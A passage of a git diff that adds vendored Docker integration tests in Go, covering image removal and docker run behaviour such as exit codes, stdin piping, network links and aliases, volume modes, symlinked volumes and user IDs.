expected. + out, _, err := dockerCmdWithError("rmi", "-f", imageIds[0]) + // The image of the running container should not be removed. + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "image is being used by running container", check.Commentf("out: %s", out)) +} + +// #13422 +func (s *DockerSuite) TestRmiUntagHistoryLayer(c *check.C) { + image := "tmp1" + // Build an image for testing. + dockerfile := `FROM busybox +MAINTAINER foo +RUN echo 0 #layer0 +RUN echo 1 #layer1 +RUN echo 2 #layer2 +` + _, err := buildImage(image, dockerfile, false) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "history", "-q", image) + ids := strings.Split(out, "\n") + idToTag := ids[2] + + // Tag layer0 to "tmp2". + newTag := "tmp2" + dockerCmd(c, "tag", idToTag, newTag) + // Create a container based on "tmp1". + dockerCmd(c, "run", "-d", image, "true") + + // See if the "tmp2" can be untagged. + out, _ = dockerCmd(c, "rmi", newTag) + // Expected 1 untagged entry + c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1, check.Commentf("out: %s", out)) + + // Now let's add the tag again and create a container based on it. + dockerCmd(c, "tag", idToTag, newTag) + out, _ = dockerCmd(c, "run", "-d", newTag, "true") + cid := strings.TrimSpace(out) + + // At this point we have 2 containers, one based on layer2 and another based on layer0. + // Try to untag "tmp2" without the -f flag. + out, _, err = dockerCmdWithError("rmi", newTag) + // should not be untagged without the -f flag + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, cid[:12]) + c.Assert(out, checker.Contains, "(must force)") + + // Add the -f flag and test again. + out, _ = dockerCmd(c, "rmi", "-f", newTag) + // should be allowed to untag with the -f flag + c.Assert(out, checker.Contains, fmt.Sprintf("Untagged: %s:latest", newTag)) +} + +func (*DockerSuite) TestRmiParentImageFail(c *check.C) { + _, err := buildImage("test", ` + FROM busybox + RUN echo hello`, false) + c.Assert(err, checker.IsNil) + + id := inspectField(c, "busybox", "ID") + out, _, err := dockerCmdWithError("rmi", id) + c.Assert(err, check.NotNil) + if !strings.Contains(out, "image has dependent child images") { + c.Fatalf("rmi should have failed because it's a parent image, got %s", out) + } +} + +func (s *DockerSuite) TestRmiWithParentInUse(c *check.C) { + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cID) + imageID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "create", imageID) + cID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cID) + imageID = strings.TrimSpace(out) + + dockerCmd(c, "rmi", imageID) +} + +// #18873 +func (s *DockerSuite) TestRmiByIDHardConflict(c *check.C) { + dockerCmd(c, "create", "busybox") + + imgID := inspectField(c, "busybox:latest", "Id") + + _, _, err := dockerCmdWithError("rmi", imgID[:12]) + c.Assert(err, checker.NotNil) + + // check that tag was not removed + imgID2 := inspectField(c, "busybox:latest", "Id") + c.Assert(imgID, checker.Equals, imgID2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go new file mode 100644 index 0000000000..9462aef800 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go @@ -0,0 +1,4689 @@ +package main + +import ( + "bufio" + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "os" + "os/exec" + "path" + "path/filepath" + "reflect" + "regexp" + "runtime" + "sort" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork/resolvconf" + "github.com/docker/libnetwork/types" + "github.com/go-check/check" + libcontainerUser "github.com/opencontainers/runc/libcontainer/user" +) + +// "test123" should be printed by docker run +func (s *DockerSuite) TestRunEchoStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "busybox", "echo", "test123") + if out != "test123\n" { + c.Fatalf("container should've printed 'test123', got '%s'", out) + } +} + +// "test" should be printed +func (s *DockerSuite) TestRunEchoNamedContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "testfoonamedcontainer", "busybox", "echo", "test") + if out != "test\n" { + c.Errorf("container should've printed 'test'") + } +} + +// docker run should not leak file descriptors. This test relies on Unix +// specific functionality and cannot run on Windows. +func (s *DockerSuite) TestRunLeakyFileDescriptors(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "busybox", "ls", "-C", "/proc/self/fd") + + // normally, we should only get 0, 1, and 2, but 3 gets created by "ls" when it does "opendir" on the "fd" directory + if out != "0 1 2 3\n" { + c.Errorf("container should've printed '0 1 2 3', not: %s", out) + } +} + +// it should be possible to lookup Google DNS +// this will fail when Internet access is unavailable +func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) { + testRequires(c, Network, NotArm) + if daemonPlatform == "windows" { + // nslookup isn't present in Windows busybox. Is built-in. Further, + // nslookup isn't present in nanoserver. Hence just use PowerShell... + dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com") + } else { + dockerCmd(c, "run", DefaultImage, "nslookup", "google.com") + } + +} + +// the exit code should be 0 +func (s *DockerSuite) TestRunExitCodeZero(c *check.C) { + dockerCmd(c, "run", "busybox", "true") +} + +// the exit code should be 1 +func (s *DockerSuite) TestRunExitCodeOne(c *check.C) { + _, exitCode, err := dockerCmdWithError("run", "busybox", "false") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 1) +} + +// it should be possible to pipe in data via stdin to a process running in a container +func (s *DockerSuite) TestRunStdinPipe(c *check.C) { + // TODO Windows: This needs some work to make compatible. + testRequires(c, DaemonIsLinux) + runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") + runCmd.Stdin = strings.NewReader("blahblah") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + if err != nil { + c.Fatalf("failed to run container: %v, output: %q", err, out) + } + + out = strings.TrimSpace(out) + dockerCmd(c, "wait", out) + + logsOut, _ := dockerCmd(c, "logs", out) + + containerLogs := strings.TrimSpace(logsOut) + if containerLogs != "blahblah" { + c.Errorf("logs didn't print the container's logs %s", containerLogs) + } + + dockerCmd(c, "rm", out) +} + +// the container's ID should be printed when starting a container in detached mode +func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + out = strings.TrimSpace(out) + dockerCmd(c, "wait", out) + + rmOut, _ := dockerCmd(c, "rm", out) + + rmOut = strings.TrimSpace(rmOut) + if rmOut != out { + c.Errorf("rm didn't print the container ID %s %s", out, rmOut) + } +} + +// the working directory should be set correctly +func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { + dir := "/root" + image := "busybox" + if daemonPlatform == "windows" { + dir = `C:/Windows` + } + + // First with -w + out, _ := dockerCmd(c, "run", "-w", dir, image, "pwd") + out = strings.TrimSpace(out) + if out != dir { + c.Errorf("-w failed to set working directory") + } + + // Then with --workdir + out, _ = dockerCmd(c, "run", "--workdir", dir, image, "pwd") + out = strings.TrimSpace(out) + if out != dir { + c.Errorf("--workdir failed to set working directory") + } +} + +// pinging Google's DNS resolver should fail when we disable the networking +func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) { + count := "-c" + image := "busybox" + if daemonPlatform == "windows" { + count = "-n" + image = WindowsBaseImage + } + + // First using the long form --net + out, exitCode, err := dockerCmdWithError("run", "--net=none", image, "ping", count, "1", "8.8.8.8") + if err != nil && exitCode != 1 { + c.Fatal(out, err) + } + if exitCode != 1 { + c.Errorf("--net=none should've disabled the network; the container shouldn't have been able to ping 8.8.8.8") + } +} + +//test --link use container name to link target +func (s *DockerSuite) TestRunLinksContainerWithContainerName(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as the networking + // settings are not populated back yet on inspect. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-i", "-t", "-d", "--name", "parent", "busybox") + + ip := inspectField(c, "parent", "NetworkSettings.Networks.bridge.IPAddress") + + out, _ := dockerCmd(c, "run", "--link", "parent:test", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(out, ip+" test") { + c.Fatalf("use a container name to link target failed") + } +} + +//test --link use container id to link target +func (s *DockerSuite) TestRunLinksContainerWithContainerID(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as the networking + // settings are not populated back yet on inspect. + testRequires(c, DaemonIsLinux) + cID, _ := dockerCmd(c, "run", "-i", "-t", "-d", "busybox") + + cID = strings.TrimSpace(cID) + ip := inspectField(c, cID, "NetworkSettings.Networks.bridge.IPAddress") + + out, _ := dockerCmd(c, "run", "--link", cID+":test", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(out, ip+" test") { + c.Fatalf("use a container id to link target failed") + } +} + +func (s *DockerSuite) TestUserDefinedNetworkLinks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet") + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // run a container in user-defined network udlinkNet with a link for an existing container + // and a link for a container that doesn't exist + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo", + "--link=third:bar", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // ping to third and its alias must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.NotNil) + + // start third container now + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=third", "busybox", "top") + c.Assert(waitRun("third"), check.IsNil) + + // ping to third and its alias must succeed now + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestUserDefinedNetworkLinksWithRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet") + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo", + "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Restart first container + dockerCmd(c, "restart", "first") + c.Assert(waitRun("first"), check.IsNil) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Restart second container + dockerCmd(c, "restart", "second") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRunWithNetAliasOnDefaultNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + + defaults := []string{"bridge", "host", "none"} + for _, net := range defaults { + out, _, err := dockerCmdWithError("run", "-d", "--net", net, "--net-alias", "alias_"+net, "busybox", "top") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + } +} + +func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "net1") + + cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Check if default short-id alias is added automatically + id := strings.TrimSpace(cid1) + aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") + c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) + + cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Check if default short-id alias is added automatically + id = strings.TrimSpace(cid2) + aliases = inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") + c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) + + // ping to first and its network-scoped aliases + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2") + c.Assert(err, check.IsNil) + // ping first container's short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1)) + c.Assert(err, check.IsNil) + + // Restart first container + dockerCmd(c, "restart", "first") + c.Assert(waitRun("first"), check.IsNil) + + // ping to first and its network-scoped aliases must succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2") + c.Assert(err, check.IsNil) + // ping first container's short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1)) + c.Assert(err, check.IsNil) +} + +// Issue 9677. +func (s *DockerSuite) TestRunWithDaemonFlags(c *check.C) { + out, _, err := dockerCmdWithError("--exec-opt", "foo=bar", "run", "-i", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unknown flag: --exec-opt") +} + +// Regression test for #4979 +func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { + + var ( + out string + exitCode int + ) + + // Create a file in a volume + if daemonPlatform == "windows" { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) + } else { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file") + } + if exitCode != 0 { + c.Fatal("1", out, exitCode) + } + + // Read the file from another container using --volumes-from to access the volume in the second container + if daemonPlatform == "windows" { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`) + } else { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file") + } + if exitCode != 0 { + c.Fatal("2", out, exitCode) + } +} + +// Volume path is a symlink which also exists on the host, and the host side is a file not a dir +// But the volume call is just a normal volume, not a bind mount +func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { + var ( + dockerFile string + containerPath string + cmd string + ) + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, SameHostDaemon, DaemonIsLinux) + name := "test-volume-symlink" + + dir, err := ioutil.TempDir("", name) + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(dir) + + // In the case of Windows to Windows CI, if the machine is setup so that + // the temp directory is not the C: drive, this test is invalid and will + // not work. + if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" { + c.Skip("Requires TEMP to point to C: drive") + } + + f, err := os.OpenFile(filepath.Join(dir, "test"), os.O_CREATE, 0700) + if err != nil { + c.Fatal(err) + } + f.Close() + + if daemonPlatform == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir) + containerPath = `c:\test\test` + cmd = "tasklist" + } else { + dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p %s\nRUN ln -s %s /test", dir, dir) + containerPath = "/test/test" + cmd = "true" + } + if _, err := buildImage(name, dockerFile, false); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", containerPath, name, cmd) +} + +// Volume path is a symlink in the container +func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { + var ( + dockerFile string + containerPath string + cmd string + ) + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, SameHostDaemon, DaemonIsLinux) + name := "test-volume-symlink2" + + if daemonPlatform == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name) + containerPath = `c:\test\test` + cmd = "tasklist" + } else { + dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p /%s\nRUN ln -s /%s /test", name, name) + containerPath = "/test/test" + cmd = "true" + } + if _, err := buildImage(name, dockerFile, false); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", containerPath, name, cmd) +} + +func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) { + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 { + c.Fatalf("run should fail because volume is ro: exit code %d", code) + } +} + +func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) { + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + var ( + volumeDir string + fileInVol string + ) + if daemonPlatform == "windows" { + volumeDir = `c:/test` // Forward-slash as using busybox + fileInVol = `c:/test/file` + } else { + testRequires(c, DaemonIsLinux) + volumeDir = "/test" + fileInVol = `/test/file` + } + dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true") + + if _, code, err := dockerCmdWithError("run", "--volumes-from", "parent:ro", "busybox", "touch", fileInVol); err == nil || code == 0 { + c.Fatalf("run should fail because volume is ro: exit code %d", code) + } +} + +// Regression test for #1201 +func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { + var ( + volumeDir string + fileInVol string + ) + if daemonPlatform == "windows" { + volumeDir = `c:/test` // Forward-slash as using busybox + fileInVol = `c:/test/file` + } else { + volumeDir = "/test" + fileInVol = "/test/file" + } + + dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true") + dockerCmd(c, "run", "--volumes-from", "parent:rw", "busybox", "touch", fileInVol) + + if out, _, err := dockerCmdWithError("run", "--volumes-from", "parent:bar", "busybox", "touch", fileInVol); err == nil || !strings.Contains(out, `invalid mode: bar`) { + c.Fatalf("running --volumes-from parent:bar should have failed with invalid mode: %q", out) + } + + dockerCmd(c, "run", "--volumes-from", "parent", "busybox", "touch", fileInVol) +} + +func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + hostpath := randomTmpDirPath("test", daemonPlatform) + if err := os.MkdirAll(hostpath, 0755); err != nil { + c.Fatalf("Failed to create %s: %q", hostpath, err) + } + defer os.RemoveAll(hostpath) + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") + + // Expect this "rw" mode to be be ignored since the inherited volume is "ro" + if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent:rw", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil { + c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `rw`") + } + + dockerCmd(c, "run", "--name", "parent2", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") + + // Expect this to be read-only since both are "ro" + if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent2:ro", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil { + c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `ro`") + } +} + +// Test for GH#10618 +func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { + path1 := randomTmpDirPath("test1", daemonPlatform) + path2 := randomTmpDirPath("test2", daemonPlatform) + + someplace := ":/someplace" + if daemonPlatform == "windows" { + // Windows requires that the source directory exists before calling HCS + testRequires(c, SameHostDaemon) + someplace = `:c:\someplace` + if err := os.MkdirAll(path1, 0755); err != nil { + c.Fatalf("Failed to create %s: %q", path1, err) + } + defer os.RemoveAll(path1) + if err := os.MkdirAll(path2, 0755); err != nil { + c.Fatalf("Failed to create %s: %q", path1, err) + } + defer os.RemoveAll(path2) + } + mountstr1 := path1 + someplace + mountstr2 := path2 + someplace + + if out, _, err := dockerCmdWithError("run", "-v", mountstr1, "-v", mountstr2, "busybox", "true"); err == nil { + c.Fatal("Expected error about duplicate mount definitions") + } else { + if !strings.Contains(out, "Duplicate mount point") { + c.Fatalf("Expected 'duplicate mount point' error, got %v", out) + } + } + + // Test for https://github.com/docker/docker/issues/22093 + volumename1 := "test1" + volumename2 := "test2" + volume1 := volumename1 + someplace + volume2 := volumename2 + someplace + if out, _, err := dockerCmdWithError("run", "-v", volume1, "-v", volume2, "busybox", "true"); err == nil { + c.Fatal("Expected error about duplicate mount definitions") + } else { + if !strings.Contains(out, "Duplicate mount point") { + c.Fatalf("Expected 'duplicate mount point' error, got %v", out) + } + } + // create failed should have create volume volumename1 or volumename2 + // we should remove volumename2 or volumename2 successfully + out, _ := dockerCmd(c, "volume", "ls") + if strings.Contains(out, volumename1) { + dockerCmd(c, "volume", "rm", volumename1) + } else { + dockerCmd(c, "volume", "rm", volumename2) + } +} + +// Test for #1351 +func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") + dockerCmd(c, "run", "--volumes-from", "parent", "-v", prefix+"/test", "busybox", "cat", prefix+"/test/foo") +} + +func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") + dockerCmd(c, "run", "--name", "parent2", "-v", prefix+"/other", "busybox", "touch", prefix+"/other/bar") + dockerCmd(c, "run", "--volumes-from", "parent1", "--volumes-from", "parent2", "busybox", "sh", "-c", "cat /test/foo && cat /other/bar") +} + +// this tests verifies the ID format for the container +func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) { + out, exit, err := dockerCmdWithError("run", "-d", "busybox", "true") + if err != nil { + c.Fatal(err) + } + if exit != 0 { + c.Fatalf("expected exit code 0 received %d", exit) + } + + match, err := regexp.MatchString("^[0-9a-f]{64}$", strings.TrimSuffix(out, "\n")) + if err != nil { + c.Fatal(err) + } + if !match { + c.Fatalf("Invalid container ID: %s", out) + } +} + +// Test that creating a container with a volume doesn't crash. Regression test for #995. +func (s *DockerSuite) TestRunCreateVolume(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true") +} + +// Test that creating a volume with a symlink in its path works correctly. Test for #5152. +// Note that this bug happens only with symlinks with a target that starts with '/'. +func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { + // Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...) + testRequires(c, DaemonIsLinux) + image := "docker-test-createvolumewithsymlink" + + buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-") + buildCmd.Stdin = strings.NewReader(`FROM busybox + RUN ln -s home /bar`) + buildCmd.Dir = workingDirectory + err := buildCmd.Run() + if err != nil { + c.Fatalf("could not build '%s': %v", image, err) + } + + _, exitCode, err := dockerCmdWithError("run", "-v", "/bar/foo", "--name", "test-createvolumewithsymlink", image, "sh", "-c", "mount | grep -q /home/foo") + if err != nil || exitCode != 0 { + c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode) + } + + volPath, err := inspectMountSourceField("test-createvolumewithsymlink", "/bar/foo") + c.Assert(err, checker.IsNil) + + _, exitCode, err = dockerCmdWithError("rm", "-v", "test-createvolumewithsymlink") + if err != nil || exitCode != 0 { + c.Fatalf("[rm] err: %v, exitcode: %d", err, exitCode) + } + + _, err = os.Stat(volPath) + if !os.IsNotExist(err) { + c.Fatalf("[open] (expecting 'file does not exist' error) err: %v, volPath: %s", err, volPath) + } +} + +// Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`. +func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, DaemonIsLinux) + name := "docker-test-volumesfromsymlinkpath" + prefix := "" + dfContents := `FROM busybox + RUN ln -s home /foo + VOLUME ["/foo/bar"]` + + if daemonPlatform == "windows" { + prefix = `c:` + dfContents = `FROM ` + WindowsBaseImage + ` + RUN mkdir c:\home + RUN mklink /D c:\foo c:\home + VOLUME ["c:/foo/bar"] + ENTRYPOINT c:\windows\system32\cmd.exe` + } + + buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") + buildCmd.Stdin = strings.NewReader(dfContents) + buildCmd.Dir = workingDirectory + err := buildCmd.Run() + if err != nil { + c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err) + } + + out, exitCode, err := dockerCmdWithError("run", "--name", "test-volumesfromsymlinkpath", name) + if err != nil || exitCode != 0 { + c.Fatalf("[run] (volume) err: %v, exitcode: %d, out: %s", err, exitCode, out) + } + + _, exitCode, err = dockerCmdWithError("run", "--volumes-from", "test-volumesfromsymlinkpath", "busybox", "sh", "-c", "ls "+prefix+"/foo | grep -q bar") + if err != nil || exitCode != 0 { + c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode) + } +} + +func (s *DockerSuite) TestRunExitCode(c *check.C) { + var ( + exit int + err error + ) + + _, exit, err = dockerCmdWithError("run", "busybox", "/bin/sh", "-c", "exit 72") + + if err == nil { + c.Fatal("should not have a non nil error") + } + if exit != 72 { + c.Fatalf("expected exit code 72 received %d", exit) + } +} + +func (s *DockerSuite) TestRunUserDefaults(c *check.C) { + expected := "uid=0(root) gid=0(root)" + if daemonPlatform == "windows" { + expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)" + } + out, _ := dockerCmd(c, "run", "busybox", "id") + if !strings.Contains(out, expected) { + c.Fatalf("expected '%s' got %s", expected, out) + } +} + +func (s *DockerSuite) TestRunUserByName(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "root", "busybox", "id") + if !strings.Contains(out, "uid=0(root) gid=0(root)") { + c.Fatalf("expected root user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByID(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "1", "busybox", "id") + if !strings.Contains(out, "uid=1(daemon) gid=1(daemon)") { + c.Fatalf("expected daemon user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDBig(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux, NotArm) + out, _, err := dockerCmdWithError("run", "-u", "2147483648", "busybox", "id") + if err == nil { + c.Fatal("No error, but must be.", out) + } + if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + c.Fatalf("expected error about uids range, got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-u", "-1", "busybox", "id") + if err == nil { + c.Fatal("No error, but must be.", out) + } + if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + c.Fatalf("expected error about uids range, got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDZero(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-u", "0", "busybox", "id") + if err != nil { + c.Fatal(err, out) + } + if !strings.Contains(out, "uid=0(root) gid=0(root) groups=10(wheel)") { + c.Fatalf("expected daemon user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserNotFound(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + _, _, err := dockerCmdWithError("run", "-u", "notme", "busybox", 